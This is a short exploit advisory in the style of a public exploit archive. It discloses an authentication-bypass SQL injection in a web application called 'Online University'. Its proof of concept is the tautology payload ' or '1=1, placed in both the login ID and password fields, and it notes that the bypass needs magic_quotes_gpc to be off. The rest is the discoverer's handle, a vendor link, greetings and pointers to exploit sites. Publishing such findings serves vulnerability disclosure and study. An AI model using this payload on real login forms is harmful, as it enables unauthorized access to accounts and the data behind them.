| Online University (Auth Bypass) SQL Injection Vulnerability|
| (works only with magic_quotes_gpc = off) |
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Homepage: http://h4ckb0x.org/
[!] Script: http://hostnomi.net/detail.php?spid=30
[!] Dork: no dork for script kiddies :p~
[!] Remote: yes
[x] PoC:
Login ID : ' or '1=1
Password : ' or '1=1
[~] Greetz: r0073r, str0ke, opt!x hacker, xoron, Ricardo Almeida, cyberlog, irvian, zreg, k1n9k0ng, letjen, team_elite, wiro sableng, samuel MC, EA ngel, and all my friend
[~] Special to: Valentin Hobel (Happy Birthday brotha) ;)
[~] Visit: inj3ct0r.com, exploit-db.com for more exploits and to update the new exploits
[~] Regards: cr4wl3r